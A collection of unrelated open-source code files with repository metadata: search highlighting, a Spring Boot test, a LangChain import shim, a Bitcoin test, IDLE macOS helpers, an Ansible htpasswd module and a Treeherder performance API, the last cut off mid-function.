        if self.fragmenter.must_retokenize():
            # No, the configured fragmenter doesn't support it
            return False

        # Maybe, if the field was configured to store characters
        field = results.searcher.schema[fieldname]
        return field.supports("characters")

    @staticmethod
    def _load_chars(results, fieldname, texts, to_bytes):
        """Populate ``results._char_cache[fieldname]`` with a per-document
        mapping of term text -> stored character offsets.
        """
        # For each docnum, create a mapping of text -> [(startchar, endchar)]
        # for the matched terms
        results._char_cache[fieldname] = cache = {}
        sorted_ids = sorted(docnum for _, docnum in results.top_n)

        for docnum in sorted_ids:
            cache[docnum] = {}

        for text in texts:
            btext = to_bytes(text)
            m = results.searcher.postings(fieldname, btext)
            docset = set(results.termdocs[(fieldname, btext)])
            for docnum in sorted_ids:
                if docnum in docset:
                    m.skip_to(docnum)
                    assert m.id() == docnum
                    cache[docnum][text] = m.value_as("characters")

    @staticmethod
    def _merge_matched_tokens(tokens):
        """Yield ``tokens`` with consecutive/overlapping matched tokens merged
        into a single token, so they are highlighted as one unit.
        """
        # Merges consecutive matched tokens together, so they are highlighted
        # as one
        token = None

        for t in tokens:
            if not t.matched:
                # Flush any pending merged token before the unmatched one.
                if token is not None:
                    yield token
                    token = None
                yield t
                continue

            if token is None:
                # Copy so extending the merged token doesn't mutate the input.
                token = t.copy()
            elif t.startchar <= token.endchar:
                # Overlaps or abuts the pending token: extend it with the
                # non-overlapping tail of t's text.
                if t.endchar > token.endchar:
                    token.text += t.text[token.endchar-t.endchar:]
                    token.endchar = t.endchar
            else:
                yield token
                token = None
                # t was not merged, also has to be yielded
                yield t

        if token is not None:
            yield token

    def highlight_hit(self, hitobj, fieldname, text=None, top=3, minscore=1):
        """Return the formatted highlight excerpt for ``fieldname`` of the
        given hit.

        :param text: overrides the stored field value when given.
        :param top: maximum number of fragments to include.
        :param minscore: minimum fragment score to include.
        """
        results = hitobj.results
        schema = results.searcher.schema
        field = schema[fieldname]
        to_bytes = field.to_bytes
        from_bytes = field.from_bytes

        if text is None:
            if fieldname not in hitobj:
                raise KeyError("Field %r is not stored." % fieldname)
            text = hitobj[fieldname]

        # Get the terms searched for/matched in this field
        if results.has_matched_terms():
            bterms = (term for term in results.matched_terms()
                      if term[0] == fieldname)
        else:
            bterms = results.query_terms(expand=True, fieldname=fieldname)
        # Convert bytes to unicode
        words = frozenset(from_bytes(term[1]) for term in bterms)

        # If we can do "pinpoint" highlighting...
        if self.can_load_chars(results, fieldname):
            # Build the docnum->[(startchar, endchar),] map
            if fieldname not in results._char_cache:
                self._load_chars(results, fieldname, words, to_bytes)

            hitterms = (from_bytes(term[1]) for term in hitobj.matched_terms()
                        if term[0] == fieldname)

            # Grab the word->[(startchar, endchar)] map for this docnum
            cmap = results._char_cache[fieldname][hitobj.docnum]
            # A list of Token objects for matched words
            tokens = []
            charlimit = self.fragmenter.charlimit
            for word in hitterms:
                chars = cmap[word]
                for pos, startchar, endchar in chars:
                    if charlimit and endchar > charlimit:
                        break
                    tokens.append(Token(text=word, pos=pos,
                                        startchar=startchar, endchar=endchar))
            tokens.sort(key=lambda t: t.startchar)
            # For tokens sharing a start offset, keep only the longest one.
            tokens = [max(group, key=lambda t: t.endchar - t.startchar)
                      for key, group in groupby(tokens, lambda t: t.startchar)]
            fragments = self.fragmenter.fragment_matches(text, tokens)
        else:
            # Retokenize the text
            analyzer = results.searcher.schema[fieldname].analyzer
            tokens = analyzer(text, positions=True, chars=True, mode="index",
                              removestops=False)
            # Set Token.matched attribute for tokens that match a query term
            tokens = set_matched_filter(tokens, words)
            tokens = self._merge_matched_tokens(tokens)
            fragments = self.fragmenter.fragment_tokens(text, tokens)

        fragments = top_fragments(fragments, top, self.scorer, self.order,
                                  minscore=minscore)
        output = self.formatter.format(fragments)
        return output
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.info;
import java.util.Properties;
import org.jspecify.annotations.Nullable;
import org.junit.jupiter.api.Test;
import org.springframework.aot.hint.RuntimeHints;
import org.springframework.aot.hint.predicate.RuntimeHintsPredicates;
import static org.assertj.core.api.Assertions.assertThat;
/**
* Tests for {@link GitProperties}.
*
* @author Stephane Nicoll
* @author Moritz Halbritter
*/
class GitPropertiesTests {

	@Test
	void basicInfo() {
		GitProperties properties = new GitProperties(
				createProperties("master", "abcdefghijklmno", "abcdefg", "1457527123"));
		assertThat(properties.getBranch()).isEqualTo("master");
		assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
		assertThat(properties.getShortCommitId()).isEqualTo("abcdefg");
	}

	@Test
	void noInfo() {
		// All accessors are null-safe when the backing properties are empty
		GitProperties properties = new GitProperties(new Properties());
		assertThat(properties.getBranch()).isNull();
		assertThat(properties.getCommitId()).isNull();
		assertThat(properties.getShortCommitId()).isNull();
		assertThat(properties.getCommitTime()).isNull();
	}

	@Test
	void coerceEpochSecond() {
		// A commit.time given in epoch seconds is coerced to epoch milliseconds
		GitProperties properties = new GitProperties(createProperties("master", "abcdefg", null, "1457527123"));
		assertThat(properties.getCommitTime()).isNotNull();
		assertThat(properties.get("commit.time")).isEqualTo("1457527123000");
		assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457527123000L);
	}

	@Test
	void coerceLegacyDateString() {
		// Zone offset without a colon ("+0100")
		GitProperties properties = new GitProperties(
				createProperties("master", "abcdefg", null, "2016-03-04T14:36:33+0100"));
		assertThat(properties.getCommitTime()).isNotNull();
		assertThat(properties.get("commit.time")).isEqualTo("1457098593000");
		assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457098593000L);
	}

	@Test
	void coerceDateString() {
		// ISO-8601 zone offset with a colon ("+01:00")
		GitProperties properties = new GitProperties(
				createProperties("master", "abcdefg", null, "2016-03-04T14:36:33+01:00"));
		assertThat(properties.getCommitTime()).isNotNull();
		assertThat(properties.get("commit.time")).isEqualTo("1457098593000");
		assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457098593000L);
	}

	@Test
	void coerceUnsupportedFormat() {
		// Unparseable commit.time is left as-is and getCommitTime() is null
		GitProperties properties = new GitProperties(
				createProperties("master", "abcdefg", null, "2016-03-04 15:22:24"));
		assertThat(properties.getCommitTime()).isNull();
		assertThat(properties.get("commit.time")).isEqualTo("2016-03-04 15:22:24");
	}

	@Test
	void shortCommitUsedIfPresent() {
		// An explicit commit.id.abbrev wins over truncating commit.id
		GitProperties properties = new GitProperties(
				createProperties("master", "abcdefghijklmno", "abcdefgh", "1457527123"));
		assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
		assertThat(properties.getShortCommitId()).isEqualTo("abcdefgh");
	}

	@Test
	void shortenCommitIdShorterThan7() {
		GitProperties properties = new GitProperties(createProperties("master", "abc", null, "1457527123"));
		assertThat(properties.getCommitId()).isEqualTo("abc");
		assertThat(properties.getShortCommitId()).isEqualTo("abc");
	}

	@Test
	void shortenCommitIdLongerThan7() {
		// Without commit.id.abbrev the short id is the first 7 characters
		GitProperties properties = new GitProperties(createProperties("master", "abcdefghijklmno", null, "1457527123"));
		assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
		assertThat(properties.getShortCommitId()).isEqualTo("abcdefg");
	}

	@Test
	void shouldRegisterHints() {
		// git.properties must be registered as a runtime resource for AOT/native
		RuntimeHints runtimeHints = new RuntimeHints();
		new GitProperties.GitPropertiesRuntimeHints().registerHints(runtimeHints, getClass().getClassLoader());
		assertThat(RuntimeHintsPredicates.resource().forResource("git.properties")).accepts(runtimeHints);
	}

	// Builds the raw Properties a git.properties file would contain; the
	// abbreviated commit id is optional.
	private static Properties createProperties(String branch, String commitId, @Nullable String commitIdAbbrev,
			String commitTime) {
		Properties properties = new Properties();
		properties.put("branch", branch);
		properties.put("commit.id", commitId);
		if (commitIdAbbrev != null) {
			properties.put("commit.id.abbrev", commitIdAbbrev);
		}
		properties.put("commit.time", commitTime);
		return properties;
	}

}
|
java
|
github
|
https://github.com/spring-projects/spring-boot
|
core/spring-boot/src/test/java/org/springframework/boot/info/GitPropertiesTests.java
|
from typing import TYPE_CHECKING, Any
from langchain_classic._api import create_importer
if TYPE_CHECKING:
from langchain_community.document_loaders import MongodbLoader
# Create a way to dynamically look up deprecated imports.
# Used to consolidate logic for raising deprecation warnings and
# handling optional imports.
# Map of deprecated attribute name -> the module it now lives in.
DEPRECATED_LOOKUP = {"MongodbLoader": "langchain_community.document_loaders"}

# Importer that raises a deprecation warning and resolves the attribute from
# its new location on first access.
_import_attribute = create_importer(__package__, deprecated_lookups=DEPRECATED_LOOKUP)


def __getattr__(name: str) -> Any:
    """Look up attributes dynamically (PEP 562 module-level __getattr__)."""
    return _import_attribute(name)


__all__ = [
    "MongodbLoader",
]
|
python
|
github
|
https://github.com/langchain-ai/langchain
|
libs/langchain/langchain_classic/document_loaders/mongodb.py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# parts taken from weirdtx.py
import test_framework.loginit
import time
import sys
# Fail fast under Python 2. Note: the original "raise <str>" raises a
# TypeError (string exceptions are not allowed), hiding the intended message.
if sys.version_info[0] < 3:
    raise RuntimeError("Use Python 3")
import logging
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
from test_framework.script import *
from test_framework.key import *
from binascii import unhexlify, hexlify
def Hash256Puzzle(s):
    """Return a script requiring a preimage whose hash256 digest equals
    hash256(s): OP_HASH256 <hash256(s)> OP_EQUAL."""
    data = s.encode() if type(s) is str else s
    return CScript([OP_HASH256, hash256(data), OP_EQUAL])
def MatchString(s):
    """Return a script satisfied by pushing data equal to ``s``:
    <s> OP_EQUAL."""
    data = s.encode() if type(s) is str else s
    return CScript([data, OP_EQUAL])
def p2pkh_list(addr):
    # Standard pay-to-pubkey-hash opcode sequence for `addr`, returned as a
    # plain list so callers can splice it into larger scripts (SignWithAorB).
    return [OP_DUP, OP_HASH160, bitcoinAddress2bin(addr), OP_EQUALVERIFY, OP_CHECKSIG]
def SignWithAorB(twoAddrs):
    # IF <p2pkh for twoAddrs[0]> ELSE <p2pkh for twoAddrs[1]> ENDIF:
    # spendable by satisfying either branch's pay-to-pubkey-hash check.
    ret = CScript([OP_IF] + p2pkh_list(twoAddrs[0]) + [OP_ELSE] + p2pkh_list(twoAddrs[1]) + [OP_ENDIF])
    return ret
class SigHashMatchTest(BitcoinTestFramework):
    """Builds a transaction signature manually via txn.SignatureHash() plus
    the ``signdata`` RPC and checks the node accepts the result."""

    def setup_chain(self, bitcoinConfDict, wallets=None):
        # Fresh 2-node chain with no pre-mined blocks.
        print("Initializing test directory " + self.options.tmpdir)
        initialize_chain_clean(self.options.tmpdir, 2, bitcoinConfDict, wallets)

    def setup_network(self, split=False):
        self.nodes = start_nodes(2, self.options.tmpdir)
        connect_nodes_bi(self.nodes, 0, 1)
        self.is_network_split = False
        self.sync_all()

    def run_test(self):
        # generate enough blocks so that nodes[0] has a balance
        self.sync_blocks()
        self.nodes[0].generate(150)
        self.sync_blocks()

        # Spend the largest available UTXO.
        unspents = self.nodes[0].listunspent()
        unspents.sort(key=lambda x: x["amount"], reverse=False)
        utxo = unspents.pop()
        amt = utxo["amount"]
        addr = utxo["address"]
        outp = {"dummy" : amt - decimal.Decimal(.0001)} # give some fee
        txn = CTransaction().deserialize(createrawtransaction([utxo], outp, p2pkh))

        # create signature manually using txn.SignatureHash() calculation
        # plus the new signdata RPC call, append the sighashbyte and make sure
        # it is accepted by the node.
        privkey = self.nodes[0].dumpprivkey(addr)
        key = CECKey()
        # NOTE(review): assumes the base58-decoded WIF layout is
        # version byte + 32-byte secret + 5-byte suffix; confirm against
        # decodeBase58's return format.
        key.set_secretbytes(decodeBase58(privkey)[1:-5])
        key.set_compressed(True)
        pub = key.get_pubkey()
        sighashcode = CScript([pub, OP_CHECKSIG])
        sighash = txn.SignatureHash(0, bytes(sighashcode),
                                    int((amt)*100000000))
        txn_mansig = unhexlify(self.nodes[0].signdata(addr, "hash",
                                                      hexlify(sighash).decode("ascii")))
        # Append the sighash byte (0x41) to the raw signature, as described
        # in the comment above.
        fullsig = txn_mansig+b"\x41"
        txn.vin[0].scriptSig = CScript([fullsig])
        txid = self.nodes[0].sendrawtransaction(txn.toHex())
        assert len(txid) == 64
if __name__ == '__main__':
    # Script entry point; cashaddr disabled in the node config.
    SigHashMatchTest().main(bitcoinConfDict = {"usecashaddr" : 0})
# Create a convenient function for an interactive python debugging session
def Test():
    """Run SigHashMatchTest with verbose debug categories; intended to be
    called from an interactive interpreter rather than the command line."""
    t = SigHashMatchTest()
    bitcoinConf = {
        "debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"],
        "blockprioritysize": 2000000,  # we don't want any transactions rejected due to insufficient fees...
        "usecashaddr" : False
    }

    # you may want these additional flags:
    # "--srcdir=<out-of-source-build-dir>/debug/src"
    # "--tmppfx=/ramdisk/test"
    flags = []  # "--nocleanup", "--noshutdown"
    if os.path.isdir("/ramdisk/test"):  # execution is much faster if a ramdisk is used
        flags.append("--tmppfx=/ramdisk/test")
    t.main(flags, bitcoinConf, None)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
A number of function that enhance IDLE on MacOSX when it used as a normal
GUI application (as opposed to an X11 application).
"""
import sys
import Tkinter
from os import path
# Cached result of runningAsOSXApp(); None means "not computed yet".
_appbundle = None

def runningAsOSXApp():
    """
    Returns True if Python is running from within an app on OSX.
    If so, assume that Python was built with Aqua Tcl/Tk rather than
    X11 Tcl/Tk.
    """
    global _appbundle
    if _appbundle is not None:
        return _appbundle
    _appbundle = sys.platform == 'darwin' and '.app' in sys.executable
    return _appbundle
# Cached result of isCarbonAquaTk(); None means "not computed yet".
_carbonaquatk = None

def isCarbonAquaTk(root):
    """
    Returns True if IDLE is using a Carbon Aqua Tk (instead of the
    newer Cocoa Aqua Tk).
    """
    global _carbonaquatk
    if _carbonaquatk is not None:
        return _carbonaquatk
    _carbonaquatk = (runningAsOSXApp()
                     and 'aqua' in root.tk.call('tk', 'windowingsystem')
                     and 'AppKit' not in root.tk.call('winfo', 'server', '.'))
    return _carbonaquatk
def tkVersionWarning(root):
    """
    Returns a string warning message if the Tk version in use appears to
    be one known to cause problems with IDLE. The Apple Cocoa-based Tk 8.5
    that was shipped with Mac OS X 10.6.

    Returns False when the Tk in use is not the known-problematic build.
    """
    if (runningAsOSXApp() and
        ('AppKit' in root.tk.call('winfo', 'server', '.')) and
        (root.tk.call('info', 'patchlevel') == '8.5.7') ):
        # NOTE(review): these are raw strings, so "\n" is emitted as a
        # literal backslash-n rather than a newline -- confirm whether the
        # caller that displays this message expects that.
        return (r"WARNING: The version of Tcl/Tk (8.5.7) in use may"
                r" be unstable.\n"
                r"Visit http://www.python.org/download/mac/tcltk/"
                r" for current information.")
    else:
        return False
def addOpenEventSupport(root, flist):
    """
    This ensures that the application will respond to open AppleEvents, which
    makes it feasible to use IDLE as the default application for python files.
    """
    def doOpenFile(*args):
        # Open each requested file in the file list.
        for fn in args:
            flist.open(fn)

    # The command below is a hook in aquatk that is called whenever the app
    # receives a file open event. The callback can have multiple arguments,
    # one for every file that should be opened.
    root.createcommand("::tk::mac::OpenDocument", doOpenFile)
def hideTkConsole(root):
    """Hide the Tk console window, if this Tk framework provides one."""
    try:
        root.tk.call('console', 'hide')
    except Tkinter.TclError:
        # Some versions of the Tk framework don't have a console object
        pass
def overrideRootMenu(root, flist):
    """
    Replace the Tk root menu by something that's more appropriate for
    IDLE.
    """
    # The menu that is attached to the Tk root (".") is also used by AquaTk for
    # all windows that don't specify a menu of their own. The default menubar
    # contains a number of menus, none of which are appropriate for IDLE. The
    # Most annoying of those is an 'About Tck/Tk...' menu in the application
    # menu.
    #
    # This function replaces the default menubar by a mostly empty one, it
    # should only contain the correct application menu and the window menu.
    #
    # Due to a (mis-)feature of TkAqua the user will also see an empty Help
    # menu.
    #
    # Fixed: 'Text' was imported twice in the original import line.
    # NOTE(review): Text, prepstr, get_accelerator and MultiCallCreator are
    # not used in this function body; imports kept in case the modules'
    # import-time side effects are relied on.
    from Tkinter import Menu, Text
    from idlelib.EditorWindow import prepstr, get_accelerator
    from idlelib import Bindings
    from idlelib import WindowList
    from idlelib.MultiCall import MultiCallCreator

    menubar = Menu(root)
    root.configure(menu=menubar)
    menudict = {}

    menudict['windows'] = menu = Menu(menubar, name='windows')
    menubar.add_cascade(label='Window', menu=menu, underline=0)

    def postwindowsmenu(menu=menu):
        # Clear the stale entries before repopulating the window list.
        end = menu.index('end')
        if end is None:
            end = -1
        if end > 0:
            menu.delete(0, end)
        WindowList.add_windows_to_menu(menu)
    WindowList.register_callback(postwindowsmenu)

    def about_dialog(event=None):
        from idlelib import aboutDialog
        aboutDialog.AboutDialog(root, 'About IDLE')

    def config_dialog(event=None):
        from idlelib import configDialog
        root.instance_dict = flist.inversedict
        configDialog.ConfigDialog(root, 'Settings')

    def help_dialog(event=None):
        from idlelib import textView
        fn = path.join(path.abspath(path.dirname(__file__)), 'help.txt')
        textView.view_file(root, 'Help', fn)

    root.bind('<<about-idle>>', about_dialog)
    root.bind('<<open-config-dialog>>', config_dialog)
    root.createcommand('::tk::mac::ShowPreferences', config_dialog)
    if flist:
        root.bind('<<close-all-windows>>', flist.close_all_callback)

        # The binding above doesn't reliably work on all versions of Tk
        # on MacOSX. Adding command definition below does seem to do the
        # right thing for now.
        root.createcommand('exit', flist.close_all_callback)

    if isCarbonAquaTk(root):
        # for Carbon AquaTk, replace the default Tk apple menu
        menudict['application'] = menu = Menu(menubar, name='apple')
        menubar.add_cascade(label='IDLE', menu=menu)
        Bindings.menudefs.insert(0,
            ('application', [
                ('About IDLE', '<<about-idle>>'),
                None,
            ]))
        tkversion = root.tk.eval('info patchlevel')
        if tuple(map(int, tkversion.split('.'))) < (8, 4, 14):
            # for earlier AquaTk versions, supply a Preferences menu item
            Bindings.menudefs[0][1].append(
                ('_Preferences....', '<<open-config-dialog>>'),
            )
    else:
        # assume Cocoa AquaTk
        # replace default About dialog with About IDLE one
        root.createcommand('tkAboutDialog', about_dialog)
        # replace default "Help" item in Help menu
        root.createcommand('::tk::mac::ShowHelp', help_dialog)
        # remove redundant "IDLE Help" from menu
        del Bindings.menudefs[-1][1][0]
def setupApp(root, flist):
    """
    Perform setup for the OSX application bundle.

    Does nothing unless Python is running from within an app bundle.
    """
    if not runningAsOSXApp():
        return
    hideTkConsole(root)
    overrideRootMenu(root, flist)
    addOpenEventSupport(root, flist)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Nimbis Services, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
module: htpasswd
version_added: "1.3"
short_description: manage user files for basic authentication
description:
- Add and remove username/password entries in a password file using htpasswd.
- This is used by web servers such as Apache and Nginx for basic authentication.
options:
path:
required: true
aliases: [ dest, destfile ]
description:
- Path to the file that contains the usernames and passwords
name:
required: true
aliases: [ username ]
description:
- User name to add or remove
password:
required: false
description:
- Password associated with user.
- Must be specified if user does not exist yet.
crypt_scheme:
required: false
choices: ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
default: "apr_md5_crypt"
description:
- Encryption scheme to be used.
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the user entry should be present or not
create:
required: false
choices: [ "yes", "no" ]
default: "yes"
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. If set to "no", will fail if the
file does not exist
notes:
- "This module depends on the I(passlib) Python library, which needs to be installed on all target systems."
- "On Debian, Ubuntu, or Fedora: install I(python-passlib)."
- "On RHEL or CentOS: Enable EPEL, then install I(python-passlib)."
requires: [ passlib>=1.6 ]
author: Lorin Hochstein
"""
EXAMPLES = """
# Add a user to a password file and ensure permissions are set
- htpasswd: path=/etc/nginx/passwdfile name=janedoe password=9s36?;fyNp owner=root group=www-data mode=0640
# Remove a user from a password file
- htpasswd: path=/etc/apache2/passwdfile name=foobar state=absent
"""
import errno
import os
from distutils.version import StrictVersion
# passlib is an optional dependency: record whether it imported so main()
# can fail with a friendly message instead of an ImportError traceback.
try:
    from passlib.apache import HtpasswdFile
    import passlib
except ImportError:
    passlib_installed = False
else:
    passlib_installed = True
def create_missing_directories(dest):
    """Ensure the parent directory of ``dest`` exists, creating it (and any
    intermediate directories) if necessary."""
    destpath = os.path.dirname(dest)
    # Guard the empty dirname case (dest is a bare filename): makedirs('')
    # would raise OSError.
    if destpath and not os.path.exists(destpath):
        try:
            os.makedirs(destpath)
        except OSError as e:
            # Another process may create the directory between the exists()
            # check and makedirs(); only that race is tolerated.
            if e.errno != errno.EEXIST:
                raise
def present(dest, username, password, crypt_scheme, create, check_mode):
    """ Ensures user is present

    Returns (msg, changed) """
    if not os.path.exists(dest):
        if not create:
            raise ValueError('Destination %s does not exist' % dest)
        if check_mode:
            return ("Create %s" % dest, True)
        create_missing_directories(dest)
        # passlib >= 1.6 takes new/default_scheme; older versions take
        # autoload/default (see the version checks throughout this module).
        if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
            ht = HtpasswdFile(dest, new=True, default_scheme=crypt_scheme)
        else:
            ht = HtpasswdFile(dest, autoload=False, default=crypt_scheme)
        # set_password is the >= 1.6 API; update() is the older equivalent.
        if getattr(ht, 'set_password', None):
            ht.set_password(username, password)
        else:
            ht.update(username, password)
        ht.save()
        return ("Created %s and added %s" % (dest, username), True)
    else:
        if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
            ht = HtpasswdFile(dest, new=False, default_scheme=crypt_scheme)
        else:
            ht = HtpasswdFile(dest, default=crypt_scheme)

        found = None
        # check_password (>= 1.6) / verify (older) report whether the stored
        # entry already matches this username/password pair.
        if getattr(ht, 'check_password', None):
            found = ht.check_password(username, password)
        else:
            found = ht.verify(username, password)

        if found:
            return ("%s already present" % username, False)
        else:
            if not check_mode:
                if getattr(ht, 'set_password', None):
                    ht.set_password(username, password)
                else:
                    ht.update(username, password)
                ht.save()
            return ("Add/update %s" % username, True)
def absent(dest, username, check_mode):
    """ Ensures user is absent

    Returns (msg, changed). Raises ValueError if the file does not exist. """
    if not os.path.exists(dest):
        # Fixed grammar of the error message ("does not exists" -> "exist").
        raise ValueError("%s does not exist" % dest)

    # passlib >= 1.6 renamed the constructor arguments.
    if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
        ht = HtpasswdFile(dest, new=False)
    else:
        ht = HtpasswdFile(dest)

    if username not in ht.users():
        return ("%s not present" % username, False)
    if not check_mode:
        ht.delete(username)
        ht.save()
    return ("Remove %s" % username, True)
def check_file_attrs(module, changed, message):
    """Apply file ownership/permission arguments and report whether anything
    about the file's attributes changed. Returns (message, changed)."""
    file_args = module.load_file_common_arguments(module.params)
    attrs_changed = module.set_fs_attributes_if_different(file_args, False)
    if attrs_changed:
        if changed:
            message += " and "
        message += "ownership, perms or SE linux context changed"
        changed = True
    return message, changed
def main():
    """Entry point for the Ansible htpasswd module: dispatch on ``state``
    and report the result via exit_json/fail_json."""
    arg_spec = dict(
        path=dict(required=True, aliases=["dest", "destfile"]),
        name=dict(required=True, aliases=["username"]),
        password=dict(required=False, default=None),
        crypt_scheme=dict(required=False, default=None),
        state=dict(required=False, default="present"),
        create=dict(type='bool', default='yes'),
    )
    module = AnsibleModule(argument_spec=arg_spec,
                           add_file_common_args=True,
                           supports_check_mode=True)

    path = module.params['path']
    username = module.params['name']
    password = module.params['password']
    crypt_scheme = module.params['crypt_scheme']
    state = module.params['state']
    create = module.params['create']
    check_mode = module.check_mode

    if not passlib_installed:
        module.fail_json(msg="This module requires the passlib Python library")

    try:
        if state == 'present':
            (msg, changed) = present(path, username, password, crypt_scheme, create, check_mode)
        elif state == 'absent':
            (msg, changed) = absent(path, username, check_mode)
        else:
            module.fail_json(msg="Invalid state: %s" % state)

        # Bug fix: check_file_attrs returns the updated (msg, changed); the
        # original discarded its return value, so ownership/permission
        # changes were never reflected in the module result.
        (msg, changed) = check_file_attrs(module, changed, msg)
        module.exit_json(msg=msg, changed=changed)
    except Exception as e:
        module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import datetime
import time
from collections import defaultdict
import django_filters
from django.conf import settings
from rest_framework import (exceptions,
filters,
pagination,
viewsets)
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST
from treeherder.model import models
from treeherder.perf.alerts import get_alert_properties
from treeherder.perf.models import (PerformanceAlert,
PerformanceAlertSummary,
PerformanceBugTemplate,
PerformanceDatum,
PerformanceFramework,
PerformanceSignature)
from treeherder.webapp.api.permissions import IsStaffOrReadOnly
from .performance_serializers import (PerformanceAlertSerializer,
PerformanceAlertSummarySerializer,
PerformanceBugTemplateSerializer,
PerformanceFrameworkSerializer)
class PerformanceSignatureViewSet(viewsets.ViewSet):
    """List performance series signatures for a project.

    The response is a dict keyed by signature hash; each value holds the
    series metadata (platform, suite, test, framework id, ...).  Query
    parameters narrow the result set via chained queryset filters.
    """
    def list(self, request, project):
        # Signatures are scoped to a repository, resolved by name.
        repository = models.Repository.objects.get(name=project)
        signature_data = PerformanceSignature.objects.filter(
            repository=repository).select_related(
            'parent_signature__signature_hash', 'option_collection',
            'platform')
        # ?parent_signature=<hash>: restrict to subtests of given parents.
        parent_signature_hashes = request.query_params.getlist('parent_signature')
        if parent_signature_hashes:
            parent_signatures = PerformanceSignature.objects.filter(
                repository=repository,
                signature_hash__in=parent_signature_hashes)
            signature_data = signature_data.filter(
                parent_signature__in=parent_signatures)
        # ?subtests=0: exclude subtests (i.e. keep only parent-less series).
        if not int(request.query_params.get('subtests', True)):
            signature_data = signature_data.filter(parent_signature__isnull=True)
        # ?id=<int>: restrict to specific signature database ids.
        signature_ids = request.query_params.getlist('id')
        if signature_ids:
            signature_data = signature_data.filter(id__in=map(int,
                                                              signature_ids))
        # ?signature=<hash>: restrict to specific signature hashes.
        signature_hashes = request.query_params.getlist('signature')
        if signature_hashes:
            signature_data = signature_data.filter(
                signature_hash__in=signature_hashes)
        # ?framework=<id>: restrict to the given frameworks.
        frameworks = request.query_params.getlist('framework')
        if frameworks:
            signature_data = signature_data.filter(
                framework__in=frameworks)
        # Time filtering: either a relative interval (seconds back from
        # "now") or an absolute start/end date range -- not both.
        interval = request.query_params.get('interval')
        start_date = request.query_params.get('start_date')  # 'YYYY-MM-DDTHH:MM:SS'
        end_date = request.query_params.get('end_date')  # 'YYYY-MM-DDTHH:MM:SS'
        if interval and (start_date or end_date):
            return Response({"message": "Provide either interval only -or- start (and end) date"},
                            status=HTTP_400_BAD_REQUEST)
        if interval:
            signature_data = signature_data.filter(
                last_updated__gte=datetime.datetime.utcfromtimestamp(
                    int(time.time() - int(interval))))
        if start_date:
            signature_data = signature_data.filter(last_updated__gte=start_date)
        if end_date:
            signature_data = signature_data.filter(last_updated__lte=end_date)
        # ?platform=<name>: restrict to a machine platform.
        platform = request.query_params.get('platform')
        if platform:
            platforms = models.MachinePlatform.objects.filter(
                platform=platform)
            signature_data = signature_data.filter(
                platform__in=platforms)
        # Build the hash-keyed response, omitting fields whose common
        # default value can be assumed by the client (bandwidth saving).
        ret = {}
        for (id, signature_hash, option_collection_hash, platform, framework,
             suite, test, lower_is_better, extra_options,
             has_subtests, parent_signature_hash) in signature_data.values_list(
                 'id',
                 'signature_hash',
                 'option_collection__option_collection_hash',
                 'platform__platform', 'framework', 'suite',
                 'test', 'lower_is_better',
                 'extra_options', 'has_subtests',
                 'parent_signature__signature_hash').distinct():
            ret[signature_hash] = {
                'id': id,
                'framework_id': framework,
                'option_collection_hash': option_collection_hash,
                'machine_platform': platform,
                'suite': suite
            }
            if not lower_is_better:
                # almost always true, save some bandwidth by assuming that by
                # default
                ret[signature_hash]['lower_is_better'] = False
            if test:
                # test may be empty in case of a summary test, leave it empty
                # then
                ret[signature_hash]['test'] = test
            if has_subtests:
                ret[signature_hash]['has_subtests'] = True
            if parent_signature_hash:
                # this value is often null, save some bandwidth by excluding
                # it if not present
                ret[signature_hash]['parent_signature'] = parent_signature_hash
            if extra_options:
                # extra_options stored as charField but api returns as list
                ret[signature_hash]['extra_options'] = extra_options.split(' ')
        return Response(ret)
class PerformancePlatformViewSet(viewsets.ViewSet):
    """Expose the distinct machine platforms that have performance data.

    Optional query parameters: ``interval`` (seconds back from now, on
    the series' last update time) and ``framework`` (repeatable ids).
    """
    def list(self, request, project):
        # Every signature belonging to the project's repository.
        queryset = PerformanceSignature.objects.filter(
            repository__name=project)
        seconds_back = request.query_params.get('interval')
        if seconds_back:
            # Keep only series updated within the requested window.
            cutoff = datetime.datetime.utcfromtimestamp(
                int(time.time() - int(seconds_back)))
            queryset = queryset.filter(last_updated__gte=cutoff)
        framework_ids = request.query_params.getlist('framework')
        if framework_ids:
